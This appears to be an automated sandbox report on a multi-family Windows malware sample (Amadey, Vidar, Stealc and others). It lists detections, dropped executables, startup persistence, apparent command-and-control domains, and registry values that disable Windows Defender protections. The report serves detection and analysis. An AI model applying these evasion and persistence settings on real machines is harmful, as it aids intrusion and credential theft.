Malware Analysis Report

2025-04-03 09:25

Sample ID 250306-cj94davwgs
Target a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972
SHA256 a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972
Tags
defense_evasion discovery spyware stealer amadey gcleaner healer litehttp stealc systembc vidar 092155 ir7am trump bot credential_access dropper evasion execution loader persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972

Threat Level: Known bad

The file a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972 was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery spyware stealer amadey gcleaner healer litehttp stealc systembc vidar 092155 ir7am trump bot credential_access dropper evasion execution loader persistence trojan

Amadey family

Systembc family

SystemBC

GCleaner

Healer

Vidar

Modifies Windows Defender TamperProtection settings

Amadey

Healer family

Modifies Windows Defender DisableAntiSpyware settings

Vidar family

Modifies Windows Defender notification settings

Litehttp family

Detect Vidar Stealer

Detects Healer an antivirus disabler dropper

Stealc family

LiteHTTP

Gcleaner family

Stealc

Modifies Windows Defender Real-time Protection settings

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Downloads MZ/PE file

Reads user/profile data of local email clients

.NET Reactor proctector

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Checks computer location settings

Unsecured Credentials: Credentials In Files

Checks BIOS information in registry

Identifies Wine through registry keys

Windows security modification

Adds Run key to start application

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Program crash

Browser Information Discovery

Kills process with taskkill

Delays execution with timeout.exe

Scheduled Task/Job: Scheduled Task

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-03-06 02:07

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-06 02:07

Reported

2025-03-06 02:10

Platform

win7-20240903-en

Max time kernel

119s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe

"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 1224

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp

Files

memory/2160-0-0x00000000013B0000-0x00000000016BD000-memory.dmp

memory/2160-1-0x0000000077400000-0x0000000077402000-memory.dmp

memory/2160-3-0x00000000013B0000-0x00000000016BD000-memory.dmp

memory/2160-2-0x00000000013B1000-0x0000000001411000-memory.dmp

memory/2160-4-0x00000000013B0000-0x00000000016BD000-memory.dmp

memory/2160-5-0x00000000013B0000-0x00000000016BD000-memory.dmp

memory/2160-6-0x00000000013B0000-0x00000000016BD000-memory.dmp

memory/2160-7-0x00000000013B1000-0x0000000001411000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-06 02:07

Reported

2025-03-06 02:10

Platform

win10v2004-20250217-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\bcngpqs\ovql.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\bcngpqs\ovql.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\bcngpqs\ovql.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\e3d77cfb89.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109100101\bc3a1e6a75.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\22e7923b7d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\ProgramData\bcngpqs\ovql.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
